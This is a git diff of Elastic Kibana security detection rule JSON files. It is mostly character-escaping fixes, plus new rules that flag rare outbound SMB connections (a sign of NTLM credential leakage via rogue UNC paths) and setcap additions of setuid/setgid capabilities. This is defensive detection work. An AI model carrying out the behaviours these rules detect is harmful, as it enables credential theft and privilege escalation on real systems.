b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json index 6c369fe18d9..e31cc1fc98e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", - "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```", + "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -78,7 +78,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json index 9fb5f43e4a1..d4479e49a11 100644 --- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", - "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```", + "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -73,7 +73,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json index fdcc376ffdc..1aaee8feecb 100644 --- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", - "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```", + "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -73,7 +73,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json index 7b5d308accc..14c88cf317e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", - "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```", + "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json index f4d127ad7ec..cdbf9b348a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json +++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", - "setup": "\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json index 211011aa49c..ca3d0459bcd 100644 --- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json index a5c3044a27a..d3aad414569 100644 --- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json index f5746bf1a41..8f37a0bcb37 100644 --- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json index d284d500367..39be1a81be3 100644 --- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json index cfd8f06dc5c..5f7a5f81303 100644 --- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json index d82419516a1..e61813755e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json index 9423fc1bf8c..4c34c8f7c92 100644 --- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json index 532dc088bd6..c777bf73e1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json index c20ddd7e390..1596239a271 100644 --- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json index a7a066b7ccd..ec2fd874338 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json index 3123e9ffa43..a32cd82c53e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_1.json b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_1.json new file mode 100644 index 00000000000..64eb56d8b2a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_1.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects rare internet network connections via the SMB protocol. SMB is commonly used to leak NTLM credentials via rogue UNC path injection.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Rare SMB Connection to the Internet", + "new_terms_fields": [ + "destination.ip" + ], + "query": "event.category:network and host.os.type:windows and process.pid:4 and \n network.transport:tcp and destination.port:(139 or 445) and \n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", + "references": [ + "https://www.securify.nl/en/blog/living-off-the-land-stealing-netntlm-hashes/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json index 51f3bda2fd2..4b7509b4f31 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json @@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "f5861570-e39a-4b8a-9259-abd39f84cb97", - "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure). Steps to implement the logging policy with Advanced Audit Configuration: ``` Computer Configuration \u003e Policies \u003e Windows Settings \u003e Security Settings \u003e Advanced Audit Policies Configuration \u003e Audit Policies \u003e DS Access \u003e Audit Directory Service Access (Success,Failure) ```", + "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure). Steps to implement the logging policy with Advanced Audit Configuration: ``` Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policies Configuration > Audit Policies > DS Access > Audit Directory Service Access (Success,Failure) ```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json index a4bf1330107..884206af633 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json @@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "f5861570-e39a-4b8a-9259-abd39f84cb97", - "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n", + "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json index 3a2d33a32b3..84a23b508fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json index 91023e512ca..3ebf69bdb7a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json index 05133b266a7..c41c9f998ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -66,7 +66,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json index 552f176a314..b2e6260b73b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -67,7 +67,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_3.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_3.json new file mode 100644 index 00000000000..8b6a8f0cfaa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_3.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions.", + "from": "now-9m", + "index": [ + 